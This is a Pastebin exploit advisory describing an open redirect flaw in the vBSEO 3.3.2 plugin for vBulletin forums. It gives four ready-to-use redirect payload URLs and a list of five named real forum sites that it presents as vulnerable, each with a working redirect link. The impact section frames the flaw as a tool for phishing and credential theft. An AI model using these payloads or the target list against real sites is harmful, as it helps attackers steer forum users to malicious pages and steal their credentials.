Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : vBulletin 4.x Seo by vBSeo 3.3.2 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/03/2019
- # Vendor Homepages : vbulletin.com ~ vbseo.com
- # Software Information Links :
- vbulletin-mods.com/forum/showthread.php?t=936
- vbulletin.web.tr/forumdisplay.php/49-vBulletin-seo-vBseo-dbseo
- forumailesi.com/vbulletin/286-vbulletin-seo-3-6-0-guvenli-ve-temiz-dosya.html
- r10.net/vbseo-hakkinda/
- # Software Affected Version : 3.3.2
- Compatible with vBulletin 3.x and 4.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- vBSEO is a Search Engine Optimization plugin for vBulletin forums.
- Your community, maximizing search engine positioning for your user-generated content.
- Attract more visitors
- vBSEO makes it easier for users to find your forums via Search Engines.
- Build relevant incoming links
- Trackbacks, Pingbacks & Refbacks encourage webnauts to link back to your forums.
- Improve Adsense™ earnings
- Adsense Targeting feature increases the relevancy of your Adsense Ads for higher conversions.
- ####################################################################
- # Impact :
- ***********
- This web application vBulletin 4.x SEO by vBSEO 3.3.2 accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value
- to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to
- steer users to malicious websites. This vulnerability is used in phishing attacks to get users
- to visit malicious sites without realizing it. Web users often encounter redirection when they
- visit the Web site of a company whose name has been changed or which has been acquired
- by another company. Visiting unreal web page user's computer becomes affected by malware
- the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # Open Redirection Exploit :
- **************************
- /redirect-to/&redirect=https://www.[REDIRECTION-ADDRESS].gov
- /vbseo.php?vbseourl=redirect-to/&redirect=https://www.[REDIRECTION-ADDRESS].gov
- /vb/vbseo.php?vbseourl=redirect-to/&redirect=https://www.[REDIRECTION-ADDRESS].gov
- /forum/vbseo.php?vbseourl=redirect-to/&redirect=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] wings900.com/vb/vbseo.php?vbseourl=redirect-to/&redirect=https://cxsecurity.com
- [+] home-education.biz/forum/vbseo.php?vbseourl=redirect-to/&redirect=https://cxsecurity.com
- [+] lotnictwo.net.pl/vbseo.php?vbseourl=redirect-to/&redirect=https://cxsecurity.com
- [+] forums.salary.sg/vbseo.php?vbseourl=redirect-to/&redirect=https://cxsecurity.com
- [+] web-silver.ru/forum/vbseo.php?vbseourl=redirect-to/&redirect=https://cxsecurity.com
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment